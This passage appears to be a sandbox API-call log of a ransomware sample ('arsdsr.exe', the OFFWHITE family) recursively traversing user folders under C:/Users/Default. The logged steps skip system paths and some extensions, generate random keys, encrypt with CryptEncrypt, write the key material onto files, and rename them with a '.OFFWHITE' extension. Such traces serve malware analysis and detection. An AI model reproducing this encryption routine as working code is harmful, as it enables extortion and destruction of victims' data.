cAlternateFileName="")) returned 0xffffffff [0151.752] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2=".") returned 1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="..") returned 1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="...") returned 1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="windows") returned -1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="$recycle.bin") returned 1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="rsa") returned -1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="ntuser.dat") returned -1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="programdata") returned -1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="appdata") returned 1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="program files") returned -1 [0151.753] lstrcmpiW (lpString1="Contacts", lpString2="program files (x86)") returned -1 [0151.753] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.753] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Contacts" | out: lpString1="C:/Users\\Default\\Contacts") returned="C:/Users\\Default\\Contacts" [0151.753] lstrcatW (in: lpString1="C:/Users\\Default\\Contacts", lpString2="\\" | out: lpString1="C:/Users\\Default\\Contacts\\") returned="C:/Users\\Default\\Contacts\\" [0151.753] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Contacts\\" | out: lpString1="C:/Users\\Default\\Contacts\\") returned="C:/Users\\Default\\Contacts\\" [0151.753] lstrcatW (in: lpString1="C:/Users\\Default\\Contacts\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Contacts\\*.*") returned="C:/Users\\Default\\Contacts\\*.*" [0151.753] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Contacts\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0151.753] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.753] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0151.753] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.753] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.753] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0151.753] lstrcmpiW (lpString1="Administrator.contact", lpString2=".") returned 1 [0151.753] lstrcmpiW (lpString1="Administrator.contact", lpString2="..") returned 1 [0151.753] lstrcmpiW (lpString1="Administrator.contact", lpString2="...") returned 1 [0151.753] lstrcmpiW (lpString1="Administrator.contact", lpString2="windows") returned -1 [0151.753] lstrcmpiW (lpString1="Administrator.contact", lpString2="$recycle.bin") returned 1 [0151.753] lstrcmpiW (lpString1="Administrator.contact", lpString2="rsa") returned -1 [0151.754] lstrcmpiW (lpString1="Administrator.contact", lpString2="ntuser.dat") returned -1 [0151.754] lstrcmpiW (lpString1="Administrator.contact", lpString2="programdata") returned -1 [0151.754] lstrcmpiW (lpString1="Administrator.contact", lpString2="appdata") returned -1 [0151.754] lstrcmpiW (lpString1="Administrator.contact", lpString2="program files") returned -1 [0151.754] lstrcmpiW (lpString1="Administrator.contact", lpString2="program files (x86)") returned -1 [0151.754] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Contacts\\" | out: lpString1="C:/Users\\Default\\Contacts\\") returned="C:/Users\\Default\\Contacts\\" [0151.754] lstrcatW (in: lpString1="C:/Users\\Default\\Contacts\\", lpString2="Administrator.contact" | out: lpString1="C:/Users\\Default\\Contacts\\Administrator.contact") returned="C:/Users\\Default\\Contacts\\Administrator.contact" [0151.754] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.754] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.754] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".exe") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".log") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".cab") returned 1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".cmd") returned 1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".com") returned 1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".cpl") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".ini") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".dll") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".url") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".ttf") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".mp3") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".pif") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".mp4") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".OFFWHITE") returned -1 [0151.754] lstrcmpiW (lpString1=".contact", lpString2=".msi") returned -1 [0151.754] lstrcmpiW (lpString1="Administrator.contact", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0151.754] GetProcessHeap () returned 0x500000 [0151.754] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526de8 [0151.754] CreateFileW (lpFileName="C:/Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0151.755] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=68382) returned 1 [0151.755] GetProcessHeap () returned 0x500000 [0151.755] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0151.755] GetProcessHeap () returned 0x500000 [0151.755] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0151.755] GetProcessHeap () returned 0x500000 [0151.755] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0151.755] GetProcessHeap () returned 0x500000 [0151.755] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0151.755] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.755] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.755] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0151.755] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.755] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.755] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0151.755] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.755] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.755] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0151.755] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.755] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.755] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0151.756] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.756] SetLastError (dwErrCode=0x0) [0151.756] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0151.796] GetLastError () returned 0x0 [0151.796] GetLastError () returned 0x0 [0151.796] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10c1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.796] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0151.796] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10d1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.796] WriteFile (in: hFile=0xb0, lpBuffer=0x526de8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526de8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0151.796] GetProcessHeap () returned 0x500000 [0151.797] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10b1e) returned 0x5667c8 [0151.797] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.797] ReadFile (in: hFile=0xb0, lpBuffer=0x5667c8, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesRead=0x295e540*=0x10b1e, lpOverlapped=0x0) returned 1 [0151.809] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.809] WriteFile (in: hFile=0xb0, lpBuffer=0x5667c8*, nNumberOfBytesToWrite=0x10b1e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesWritten=0x295e54c*=0x10b1e, lpOverlapped=0x0) returned 1 [0151.810] GetProcessHeap () returned 0x500000 [0151.810] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5667c8 | out: hHeap=0x500000) returned 1 [0151.810] CloseHandle (hObject=0xb0) returned 1 [0151.810] GetProcessHeap () returned 0x500000 [0151.810] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0151.810] GetProcessHeap () returned 0x500000 [0151.810] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0151.810] GetProcessHeap () returned 0x500000 [0151.810] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0151.810] GetProcessHeap () returned 0x500000 [0151.810] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0151.810] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\Default\\Contacts\\Administrator.contact" | out: lpString1="C:/Users\\Default\\Contacts\\Administrator.contact") returned="C:/Users\\Default\\Contacts\\Administrator.contact" [0151.810] lstrcatW (in: lpString1="C:/Users\\Default\\Contacts\\Administrator.contact", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\Contacts\\Administrator.contact.OFFWHITE") returned="C:/Users\\Default\\Contacts\\Administrator.contact.OFFWHITE" [0151.810] MoveFileW (lpExistingFileName="C:/Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="C:/Users\\Default\\Contacts\\Administrator.contact.OFFWHITE" (normalized: "c:\\users\\default\\contacts\\administrator.contact.offwhite")) returned 1 [0151.811] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.811] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0151.811] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0151.811] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0151.811] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0151.811] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0151.812] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0151.812] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0151.812] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0151.812] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0151.812] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0151.812] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0151.812] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Contacts\\" | out: lpString1="C:/Users\\Default\\Contacts\\") returned="C:/Users\\Default\\Contacts\\" [0151.812] lstrcatW (in: lpString1="C:/Users\\Default\\Contacts\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Contacts\\desktop.ini") returned="C:/Users\\Default\\Contacts\\desktop.ini" [0151.812] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.812] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.812] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0151.812] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0151.812] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0151.812] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0151.812] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0151.812] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0151.812] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0151.812] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0151.812] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0151.812] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0151.812] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2=".") returned 1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="..") returned 1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="...") returned 1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="windows") returned -1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="$recycle.bin") returned 1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="rsa") returned -1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="ntuser.dat") returned -1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="programdata") returned -1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="appdata") returned 1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="program files") returned -1 [0151.812] lstrcmpiW (lpString1="Cookies", lpString2="program files (x86)") returned -1 [0151.813] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.813] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Cookies" | out: lpString1="C:/Users\\Default\\Cookies") returned="C:/Users\\Default\\Cookies" [0151.813] lstrcatW (in: lpString1="C:/Users\\Default\\Cookies", lpString2="\\" | out: lpString1="C:/Users\\Default\\Cookies\\") returned="C:/Users\\Default\\Cookies\\" [0151.813] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Cookies\\" | out: lpString1="C:/Users\\Default\\Cookies\\") returned="C:/Users\\Default\\Cookies\\" [0151.813] lstrcatW (in: lpString1="C:/Users\\Default\\Cookies\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Cookies\\*.*") returned="C:/Users\\Default\\Cookies\\*.*" [0151.813] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Cookies\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0151.813] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="...") returned 1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="$recycle.bin") returned 1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="rsa") returned -1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="ntuser.dat") returned -1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="programdata") returned -1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="appdata") returned 1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="program files") returned -1 [0151.813] lstrcmpiW (lpString1="Desktop", lpString2="program files (x86)") returned -1 [0151.813] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.813] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Desktop" | out: lpString1="C:/Users\\Default\\Desktop") returned="C:/Users\\Default\\Desktop" [0151.813] lstrcatW (in: lpString1="C:/Users\\Default\\Desktop", lpString2="\\" | out: lpString1="C:/Users\\Default\\Desktop\\") returned="C:/Users\\Default\\Desktop\\" [0151.813] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Desktop\\" | out: lpString1="C:/Users\\Default\\Desktop\\") returned="C:/Users\\Default\\Desktop\\" [0151.813] lstrcatW (in: lpString1="C:/Users\\Default\\Desktop\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Desktop\\*.*") returned="C:/Users\\Default\\Desktop\\*.*" [0151.813] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Desktop\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0151.814] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.814] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0151.814] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.814] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.814] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.814] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0151.814] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0151.814] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0151.814] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0151.814] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0151.814] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0151.815] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0151.815] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0151.815] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0151.815] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0151.815] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0151.815] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Desktop\\" | out: lpString1="C:/Users\\Default\\Desktop\\") returned="C:/Users\\Default\\Desktop\\" [0151.815] lstrcatW (in: lpString1="C:/Users\\Default\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Desktop\\desktop.ini") returned="C:/Users\\Default\\Desktop\\desktop.ini" [0151.815] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.815] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.815] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0151.815] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0151.815] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0151.815] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0151.815] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0151.815] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0151.815] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0151.815] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0151.815] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0151.815] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0151.815] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="...") returned 1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="$recycle.bin") returned 1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="rsa") returned -1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="ntuser.dat") returned -1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="programdata") returned -1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="appdata") returned 1 [0151.815] 